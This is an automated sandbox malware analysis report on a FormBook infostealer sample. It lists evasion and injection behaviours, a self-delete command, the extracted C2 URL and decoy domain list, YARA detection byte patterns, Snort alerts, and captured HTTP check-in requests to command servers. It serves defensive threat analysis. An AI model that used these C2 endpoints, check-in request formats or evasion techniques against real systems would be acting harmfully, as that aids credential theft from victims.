Analysis Report NdBLyH2h5d.exe

Overview

General Information

Sample Name: NdBLyH2h5d.exe
Analysis ID: 385309
MD5: 3fef6985af0d52ab6701df170096b504
SHA1: ac8db3220c960262f8e666eae676066cec541b3a
SHA256: a9c3d37d324e9b6a0ebf9f9369c68cc288117edc4657d086b0fbc0cbafee9e64
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • NdBLyH2h5d.exe (PID: 5612 cmdline: 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: 3FEF6985AF0D52AB6701DF170096B504)
    • NdBLyH2h5d.exe (PID: 6140 cmdline: 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: 3FEF6985AF0D52AB6701DF170096B504)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 4228 cmdline: /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.montcoimmigrationlawyer.com/uoe8/"], "decoy": ["chalance.design", "certifiedlaywernj.com", "bsbgraphic.com", "caeka.com", "zagorafinancial.com", "cvingenieriacivil.net", "mojilifenoosa.com", "bucktheherd.net", "sparkmonic.com", "catherineandwilson.com", "cdefenders.com", "intersp.net", "santoriniimpressivetours.net", "arkansaspaymentrelief.com", "tewab.com", "bjzjgjg.com", "michgoliki.com", "oallahplease.com", "plaisterpress.com", "redyroblx.com", "funnyfootballmugs.com", "borderlesstrade.info", "partequity.net", "3992199.com", "bestcoloncleanseblog.com", "online-legalservices.com", "fibermover.com", "magen-tracks.xyz", "hotelsinshirdimkm.com", "beachjunction.com", "lanren.plus", "nouvellecartebancaire.com", "thegiftsofdepression.com", "metabol.parts", "dvxdkrbll.icu", "flsprayer.com", "przyczepy.net", "cantinhosdeaparecida.com", "californiasecuritycamera.com", "nevadasmallbusinessattorney.com", "skipperdaily.com", "missjeschickt.com", "rocketmortgageshady.net", "upholsteredwineracks.com", "best20singles.com", "fsquanyi.com", "ronlinebiz.com", "gaelmobilecarwash.com", "commercials.pro", "bl927.com", "workforceuae.com", "innercritictypes.com", "unipacksexpress.com", "chaitanya99.com", "rangamaty.com", "7chd.com", "keydefi.com", "liveporn.wiki", "carajedellcasting.com", "gooddoggymedia.com", "boldercoolware.com", "hispekdiamond.com", "expnashvilletn.com", "swashbug.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
1.2.NdBLyH2h5d.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.NdBLyH2h5d.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.montcoimmigrationlawyer.com/uoe8/"], "decoy": ["chalance.design", "certifiedlaywernj.com", "bsbgraphic.com", "caeka.com", "zagorafinancial.com", "cvingenieriacivil.net", "mojilifenoosa.com", "bucktheherd.net", "sparkmonic.com", "catherineandwilson.com", "cdefenders.com", "intersp.net", "santoriniimpressivetours.net", "arkansaspaymentrelief.com", "tewab.com", "bjzjgjg.com", "michgoliki.com", "oallahplease.com", "plaisterpress.com", "redyroblx.com", "funnyfootballmugs.com", "borderlesstrade.info", "partequity.net", "3992199.com", "bestcoloncleanseblog.com", "online-legalservices.com", "fibermover.com", "magen-tracks.xyz", "hotelsinshirdimkm.com", "beachjunction.com", "lanren.plus", "nouvellecartebancaire.com", "thegiftsofdepression.com", "metabol.parts", "dvxdkrbll.icu", "flsprayer.com", "przyczepy.net", "cantinhosdeaparecida.com", "californiasecuritycamera.com", "nevadasmallbusinessattorney.com", "skipperdaily.com", "missjeschickt.com", "rocketmortgageshady.net", "upholsteredwineracks.com", "best20singles.com", "fsquanyi.com", "ronlinebiz.com", "gaelmobilecarwash.com", "commercials.pro", "bl927.com", "workforceuae.com", "innercritictypes.com", "unipacksexpress.com", "chaitanya99.com", "rangamaty.com", "7chd.com", "keydefi.com", "liveporn.wiki", "carajedellcasting.com", "gooddoggymedia.com", "boldercoolware.com", "hispekdiamond.com", "expnashvilletn.com", "swashbug.com"]}
Multi AV Scanner detection for submitted file
Source: NdBLyH2h5d.exe | Virustotal: Detection: 20%
Source: NdBLyH2h5d.exe | ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match | File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 6.2.rundll32.exe.4d44f8.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.rundll32.exe.4b17960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: NdBLyH2h5d.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: NdBLyH2h5d.exe, 00000000.00000003.216210756.000000001EFE0000.00000004.00000001.sdmp, NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NdBLyH2h5d.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: NdBLyH2h5d.exe, 00000001.00000002.253158543.0000000002640000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_004026BC FindFirstFileA,0_2_004026BC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 4x nop then pop ebx 1_2_00406A9C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 4x nop then pop edi 1_2_0041563B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 4x nop then pop ebx 1_1_00406A9C
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 4x nop then pop edi 1_1_0041563B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop ebx 6_2_02BA6A96
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop edi 6_2_02BB563B

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49713 -> 52.15.160.167:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 213.171.195.105:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49725 -> 23.227.38.74:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49735 -> 104.21.24.135:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.montcoimmigrationlawyer.com/uoe8/
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.fibermover.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.mojilifenoosa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.7chd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.hispekdiamond.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.swashbug.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.zagorafinancial.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.funnyfootballmugs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.przyczepy.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.3992199.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.montcoimmigrationlawyer.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.missjeschickt.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1 Host: www.fibermover.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 45.142.156.44
Source: Joe Sandbox View | IP Address: 23.227.38.74
Source: Joe Sandbox View | ASN Name: CNSERVERSUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: unknown | DNS traffic detected: queries for: www.fibermover.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 12 Apr 2021 08:06:24 GMT Content-Type: text/html Content-Length: 153 Connection: close Server: nginx/1.16.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: explorer.exe, 00000004.00000000.237810152.000000000F675000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: rundll32.exe, 00000006.00000002.483040430.0000000004C92000.00000004.00000001.sdmp | String found in binary or memory: https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EA0

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
